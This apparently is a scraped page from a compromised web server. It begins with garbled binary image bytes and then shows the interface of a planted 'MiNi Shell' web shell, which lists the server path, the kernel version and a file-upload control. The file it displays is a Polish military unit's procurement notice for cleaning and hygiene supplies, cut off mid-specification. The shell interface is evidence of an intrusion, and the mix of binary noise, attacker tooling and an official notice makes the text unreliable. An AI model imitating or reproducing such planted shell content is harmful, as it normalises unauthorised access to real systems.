JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231123/0050704101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP I DOSTAWY ŚRODKÓW CZYSTOŚCI I HIGIENY ORAZ AKCESORIÓW GOSPODARCZYCH W 2024R. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">21 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 281385396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kwiatkowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">21wog@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://21wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> 21 Wojskowy Oddział Gospodarczy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP I DOSTAWY ŚRODKÓW CZYSTOŚCI I HIGIENY ORAZ AKCESORIÓW GOSPODARCZYCH W 2024R. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a8a2bc59-8920-11ee-9fb5-3edbb70f45bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00507041</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00127407/20/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.20 DOSTAWY ŚRODKÓW CZYSTOŚCI I HIGIENY ORAZ AKCESORIÓW GOSPODARCZYCH</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/21wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane<br/>w Regulaminie korzystania z usług Systemu (Regulamin Portalu e-Usług) dostępnym<br/>z poziomu modułu E-learning dla wszystkich użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) <br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	Administratorem Pani/Pana danych osobowych jest 21 Wojskowy Oddział Gospodarczy w Elblągu, ul. Kwiatkowskiego 15, 82-300 Elbląg, e-mail: 21wog@ron.mil.pl;<br/>	Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach związanych z danymi osobowymi pod adresem e-mail: 21wog@ron.mil.pl;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „ Zakup <br/>i dostawy środków czystości i higieny oraz akcesoriów gospodarczych w 2024 r.” <br/>nr postępowania 76/SZP/2023;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania. <br/>	Pani/Pana dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest <br/>art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">j.w.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">21WOG-SZP.2712.77.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp.	Nazwa przedmiotu zamówienia Jednostka miary	Minimalna ilość zamówienia	Maksymalna ilość zamówienia	Miejsce dostawy:<br/>1. Filtr wody do ekspresów ciśnieniowych	szt.	50	175	Magazyn służby żywnościowej 82-300 Elbląg, ul. Kwiatkowskiego 15<br/><br/>2. Serwetki gastronomiczne białe a500	opak	500	1 750	<br/>3. Serwetki gastronomiczne kolorowe a20	opak	50	175	<br/>4. Ścierka ostra	szt.	200	700	<br/>5. Worki na śmieci 60 l	opak	200	700	<br/>6. Worki na śmieci 120 l	opak	500	1 750	<br/>7. Fartuch ochronny foliowy jednorazowy a100	opak	50	175	<br/>8. Rękawice jednorazowe elastyczne a100	opak	100	350	<br/>9. Szczotka z tworzywa do mycia HACCP	szt.	10	35	<br/>10. Ścierka uniwersalna do naczyń	szt.	100	350	<br/>11. Woreczki śniadaniowe	opak	400	1 400	<br/>12. Mop kompletny	szt.	10	35	<br/>13. Szczotka do mycia z tworzywa z rączką	szt.	50	175	<br/>14. Folia aluminiowa do pieczenia	rolka	50	175	<br/>15. Wkład do mopa	szt.	30	105	<br/>16. Woreczki strunowe na próbki żywności 120x180mm z miejscem na opis	szt.	2 000	7 000	<br/>17. Fartuch z polipropylenu długi rękaw	szt.	50	175	<br/>18. Szczotka twarda do blatów z tworzywa	szt.	10	35	<br/>19. Ścierka z mikrofibry	szt.	50	175	<br/>20. Pojemnik do zgrzewu 1-dzielny 227x187x40 szt.	2 000	7 000	<br/>21. Worki na śmieci 180 l	opak	100	350	<br/>22. Worki na śmieci 240 l	opak	100	350	<br/>23. Ubranie kuchenne ochronne jednorazowe	kpl.	50	175	<br/>24. Rękawice termiczne	para	5	18	<br/>25. Worki do pakowarki próżniowej 25x35cm	szt.	500	1 750	<br/>26. Dozownik do mydła, płynu dezynfekującego	szt.	4	14	<br/>27. Dozowniki do ręczników papierowych	szt.	4	14	<br/>28. Szczotka do szorowania &#34;żelazko&#34;	szt.	50	175	<br/>29. Worki do mrożenia produktów spożywczych	opak	50	175	<br/>30. Folia spożywcza 45cmx300m	rolka	30	105	<br/>31. Folia STRETCH	rolka	100	350	<br/>32. Gąbka kuchenna zmywak	szt.	500	1 750	<br/>33. Reklamówki jednorazowe	opak	200	700	Magazyn służby żywnościowej 82-300 Elbląg, ul. Kwiatkowskiego 15<br/><br/>34. Ręcznik kuchenny w rolce	rolka	2 000	7 000	<br/>35. Papier pakowy do kontaktu z żywnością w arkuszach 70x100	kg	10	35	<br/>36. Pojemnik do zgrzewu 2-dzielny 227x187x50 szt.	2 000	7 000	<br/>37. Folia PP do zgrzewu 180mm x 250m rolka	2	7	<br/>38. Folia PP do zgrzewu 185mm x 200m rolka	2	7	<br/>39. Ściągacz do wody	szt.	10	35	<br/>40. Drążek do ściągacza wody	szt.	10	35	<br/>41. Szczotka zmiotka	szt.	10	35	<br/>42. Zamiatacz z trzonkiem	szt.	10	35	<br/>43. Taśma spinająca 12mm 3000m	rolka	2	7	<br/>44. Zapinka do taśmy spinającej 13mm a3000	opak	2	7	<br/>45. Mydelniczka zamykana	szt.	800	2 450	Magazyn mundurowy, 82-300 Elbląg ul. Królewiecka 169 <br/><br/>Magazyn mundurowy, 14-500 Braniewo ul. Sikorskiego 41<br/><br/>Magazyn mundurowy, 14-300 Morąg al. Wojska Polskiego 16<br/><br/>Magazyn mundurowy, 11-200 Bartoszyce ul. Wojska Polskiego 4<br/>46. Kubek do mycia zębów	szt.	800	2 450	<br/>47. Szczotka do rąk	szt.	800	2 450	<br/>48. Szczoteczka do mycia zębów	szt.	800	3 500	<br/>49. Kosmetyczka na zamek błyskawiczny	szt.	800	2 450	<br/>50. Szczotka twarda do czyszczenia obuwia	szt.	800	1 050	<br/>51. Szczotka miękka do czyszczenia obuwia	szt.	800	1 050	<br/>52. Mazak do pasty do obuwia	szt.	800	1 050	<br/>53. Woreczek na przybory do czyszczenia obuwia	szt.	800	1 050	<br/>54. Maszynka jednorazowa do golenia	szt.	1 600	2 100	<br/><br/>Wymagania wspólne dla zamówienia nr 1:<br/>1.	Gwarancja (termin ważności) min. 12 miesięcy na cały asortyment licząc od daty przyjęcia dostawy do magazynu Zamawiającego.<br/>2.	W przypadku gdy producent udziela gwarancji dłużej niż 12 miesięcy, gwarancja kończy się <br/>w terminie przez niego ustalonym.<br/>3.	Wykonawca dostarczy przedmiot zamówienia fabrycznie nowy i wolny od wad.<br/>4.	Produkty z pozycji: 1-3, 11, 14, 16, 20, 25, 29-30, 35-38 oznakowane „do kontaktu <br/>z żywnością”;<br/>5.	Zamówienie będzie realizowane z wykorzystaniem przez zamawiającego prawa opcji tj. opcja polega na powtórzeniu tego samego asortymentu do ilości maksymalnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39220000-0 - Sprzęt kuchenny, artykuły gospodarstwa domowego i artykuły domowe oraz artykuły cateringowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Jeżeli dla pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość oznacza to, że dla danej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Przyjęty do realizacji wariant ilości dostaw dla ilości minimalnych - 40%<br/>2.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/>K1 – liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”<br/>K2 – liczba punktów uzyskana przez daną ofertę w kryterium „Przyjęty do realizacji wariant ilości dostaw dla ilości minimalnych”<br/><br/>3.	W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/><br/> najniższa oferowana cena brutto dla ilości minimalnych <br/>Liczba punktów = ---------------------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto dla ilości minimalnych oferty badanej<br/><br/>4.	W kryterium „Przyjęty do realizacji wariant ilości dostaw dla ilości minimalnych” oferta uzyska:<br/>L.p.	Wariant ilości dostaw <br/><br/>Ilość punktów<br/><br/><br/>1.	WARIANT I:<br/>Po jednej dostawie dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.<br/>	0 pkt<br/>2.	WARIANT II: <br/>Po dwie dostawy dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.<br/>	20 pkt<br/>3.	WARIANT III:<br/>Po trzy dostawy dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.	30 pkt<br/>4.	WARIANT IV – <br/>Po cztery dostawy dla ilości minimalnych w trakcie realizacji umowy do każdego z magazynów określonych w opisie przedmiotu zamówienia.	40 pkt<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant ilości dostaw i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 4 formularza ofertowego (załącznik nr 2 do SWZ).<br/>UWAGA:<br/>1)	Termin realizacji dostaw dla ilości minimalnych i maksymalnych do każdego <br/>z magazynów określonych w opisie przedmiotu zamówienia od dnia przesłania zamówienia przez Zamawiającego wynosi do 10 dni roboczych. Za dzień roboczy Zamawiający rozumie dzień od poniedziałku do piątku.<br/>2)	W przypadku braku zaznaczenia przez Wykonawcę w formularzu ofertowym żadnego przyjętego do realizacji wariantu ilości dostaw, Zamawiający uzna, że Wykonawca zadeklarował WARIANT I, w związku z tym otrzyma 0 pkt. <br/>3)	Dostawy do magazynów Zamawiającego w godz.:<br/>- poniedziałek - czwartek 8:00-13:00,<br/>- w piątek 8:00-12:00.<br/>5.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>6.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>7.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przyjęty do realizacji wariant dostaw</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp.	Nazwa przedmiotu zamówienia Jednostka miary	Minimalna ilość zamówienia	Maksymalna ilość zamówienia	Miejsce dostawy:<br/>82-300 Elbląg,<br/> ul. Kwiatkowskiego 15<br/>1. Preparat do programowanego mycia pieca konwekcyjno-parowego	litr	100	400	Magazyn służby żywnościowej<br/>2. Produkt do usuwania osadów mineralnych	litr	300	1 200	Magazyn służby żywnościowej<br/>3. Produkt do ręcznego mycia naczyń litr	2 000	8 000	Magazyn służby żywnościowej<br/>4. Produkt do dezynfekcji powierzchni litr	200	800	Magazyn służby żywnościowej<br/>5. Produkt do dezynfekcji rąk	litr	200	800	Magazyn służby żywnościowej<br/>6. Produkt do mycia i dezynfekcji urządzeń chłodniczych	litr	100	400	Magazyn służby żywnościowej<br/>7. Mydło w płynie antybakteryjne	litr	120	480	Magazyn służby żywnościowej<br/>8. Produkt do usuwania tłuszczu i przypaleń	litr	100	400	Magazyn służby żywnościowej<br/>9. Produkt do maszynowego mycia naczyń	litr	300	1 200	Magazyn służby żywnościowej<br/>10. Produkt do nabłyszczania naczyń w zmywarkach litr	200	800	Magazyn służby żywnościowej<br/>11. Produkt do czyszczenia i konserwacji stali nierdzewnej	litr	100	400	Magazyn służby żywnościowej<br/>12. Produkt do mycia i dezynfekcji urządzeń	litr	120	480	Magazyn służby żywnościowej<br/>13. Produkt do czyszczenia naczyń kuchennych	kg	100	400	Magazyn służby żywnościowej<br/>14. Produkt do odtłuszczania powierzchni	litr	200	800	Magazyn służby żywnościowej<br/>15. Produkt do czyszczenia aluminium	litr	150	600	Magazyn służby żywnościowej<br/>16. Produkt do mycia i czyszczenia sanitariatów	litr	80	320	Magazyn służby żywnościowej<br/>17. Preparat do czyszczenia ekspresów ciśnieniowych	opak	30	120	Magazyn służby żywnościowej<br/>18. Preparat do odkamieniania ekspresów ciśnieniowych	litr	20	80	Magazyn służby żywnościowej<br/>19. Sól do zmiękczaczy wody w tabletkach	kg	1 000	4 000	Magazyn służby żywnościowej<br/>20. Preparat do dezynfekcji kratek ściekowych	litr	80	320	Magazyn służby żywnościowej<br/>21. Neutralizator zapachów kuchennych.	szt.	60	240	Magazyn służby żywnościowej<br/>22. Środek do trudno usuwalnych zabrudzeń do zastosowania w urządzeniach mycia ciśnieniowego	litr	100	400	Magazyn służby żywnościowej<br/>23. Preparat do dezynfekcji zbiorników wody	litr	80	320	Magazyn służby żywnościowej<br/>24. Płyn do mycia szkła	litr	60	240	Magazyn służby żywnościowej<br/>Wykonawca zobowiązuje się: <br/>1. W stosunku do produktów do dezynfekcji powierzchni oraz dezynfekcji rąk, na wezwanie<br/> Zamawiającego, Wykonawca dostarczy pozwolenie na obrót produktem biobójczym wydane<br/> przez Urząd Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych.<br/>2. Na wezwanie Zamawiającego należy dostarczyć certyfikaty zarządzania jakością ISO 9001 i ISO <br/> 1400 lub inny certyfikat jakości wydany przez upoważniony organ certyfikacji dla oferowanych produktów przedmiotu zamówienia określonych tym wymogiem.<br/> <br/>3. Wykonawca zobowiązany jest do wykonania w cenie oferty następujące zadania w okresie <br/> obowiązywania umowy:<br/>1) Wykonawca z chwilą zawiadomienia przez Zamawiającego o rozpoczęciu przez niego stosowania<br/> środków Wykonawcy, zobowiązuje się zamontować w ciągu 5 dni roboczych od powiadomienia<br/> następujące urządzenia dozujące w wskazanych obiektach kuchennych:<br/>a) Urządzenie ścienne z przyłączem wody ciepłej ¾’’ do pianowo - ciśnieniowego mycia<br/>i dezynfekcji powierzchni roboczych, posadzek i glazury z wężem zbrojnym ok.15-20 mb, odpornym na temp. do 70°C zakończonym pistoletem w obudowie gumowej (lancą) - w ilości 4 szt. we wskazanych obiektach kuchennych:<br/>b) Urządzenie dozujące do sporządzania roztworów roboczych związanych z myciem<br/>i dezynfekcją – system dozowania wyposażony w zawór umożliwiający wybór co najmniej<br/>4 produktów czyszczących 4 szt.:<br/>Specyfikacja 